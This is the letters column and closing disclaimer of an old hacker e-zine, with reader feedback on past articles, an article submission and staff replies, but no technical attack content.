<*> Welcome friends. It's that time again, that time we sort out the flames from the congrats and the questions from the statements. Keep in mind that we really appreciate all correspondence that we receive. The latest ascii art logo was designed by GPF#2 (again) thanks man :). The e-mails are arranged in the order of the date they were received. :..Everlasting Support..: From: "Victor Ocampo" To: zengus@yahoo.com Subject: support hi! my name's phairygod and i'm a newbie from the philippines. can you please send me your previous issues(1&2)? more power! <*> <*> <*> <*> <*> <*> Thanks for contacting us. We informed phairygod that we don't have time to send old issues to people. By sending his e-mail to the old address it was clear that he probably saw an old newsgroup post and didn't know the address of our website, which is understandable. Now what we would most like to hear from him (and the rest of you) is what you think of the articles we write (including non staff members). Send your input as a personal favour to us. :...Article Submission..: From: THE MOB BOSS To: under_p@yahoo.com Subject: Article Submission Enclosed find three different articles I have written in the past year. Please read them over and post which ever you like in your ezine. Hope you enjoy them and find them informative. Btw the ethics one is the oldest and the Mob Boss's Guide To Hacking is the latest one. -The Mob Boss; http://mobboss.dragx.cx <*> <*> <*> <*> <*> <*> Thanks Mob Boss. Readers can find The Mob Boss's Guide To Hacking in this month's issue, weighing in at a whopping 30kb. :.:.:.Some Feedback.:.:.: From: Firestart To: zengus@yahoo.com Subject: Up hey i havent been online for a while recently because TE disconnected my phone line *grrr* but dogs told me about Up and i just read v1 and v2. Its not bad,HitMan though seems to be a total kiddie, IMO he makes the zine look bad and his article's seem to be more interested in destruction than learning. Theirs some handy things in the zine for win95 boxes if your ever bored in school,but i usually dont bother wasteing my energy so more *nix related material would be better. CrossFire's 'UNIX Security Holes' article was quite good but it would be better if he found the holes instead of taking them from rootshell, bugtraq etc.Your 'Bouncing your IP' article was good i can see you put a fair bit of effort into it. I could of done a better article on meridian mail if you wanted,but i might do something on conferances,i dont like being rushed though,and prefer technical things compared to creative things. just thought id say keep it Up <--heh :) you should've mentioned it on the hackers_ireland list, you wont get slagged if its not lame im sure,so you can reply to Hackers_Ireland@onelist.com if you want to extra plug but id say you do well enough with alt.ph.uk,i used to get 100+ hits a day on my site before it went down,just having it in my .sig their :) PS: bit of complaint,when you say that the people make the zine,and you want their opinions why do you ridicule their opinions in the second last section after asking for them?? and another thing: shouldnt the disclaimer be at the start! -- We will have solar energy as soon as the utility companies solve one technical problem -- how to run a sunbeam through a meter. <*> <*> <*> <*> <*> <*> Hello Firestart, good to see you back online. We hope you do decide to write a file on conferences. Don't worry about time, there is no real rush. There has been some minor tweaking to this e-zine over the months. For instance, no more taking the piss out of people who take time out of their lives to e-mail us as you hoped for. The question about the disclaimer is one asked quite often. The reason it comes at the end is because it is legally binding no matter where we put it and this way people needn't have legal bullshit shoved in their faces. :..::..End Of File..::..: :..::.File 14 Of 14.::..: :..Disclaimer & The End.: :.::.:.By Up Staff.:.::.: <*> Use this information at your own risk. Staff or contributors to Underground Periodical, nor the persons providing or hosting Underground Periodical, will NOT assume ANY responsibility for the use, misuse, or abuse, of any information provided herein. The previous information is provided for educational purposes ONLY. This information is NOT to be used for any illegal purposes whatsoever. <*> By reading Underground Periodical you ARE AGREEING to the following terms: I understand that using this information is illegal. I agree to, and understand, that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Underground Periodical staff, contributors, or anyone that provided this issue or any other issue of Underground Periodical whether it were official or without notification. I understand that this information is for educational purposes only. Thanks for reading. ________ __ __ ______ ______ ___ __ ____ |__ __| | | | | | ___| | ___| | \ | | | _ \ | | | |_| | | |__ | |__ | \ | | | | | \ | | | _ | | __| | __| | |\ \| | | | | | | | | | | | | |___ | |___ | | \ | | |_| / |__| |__| |__| |______| |______| |__| \___| |____/ :..::..End Of File..::..: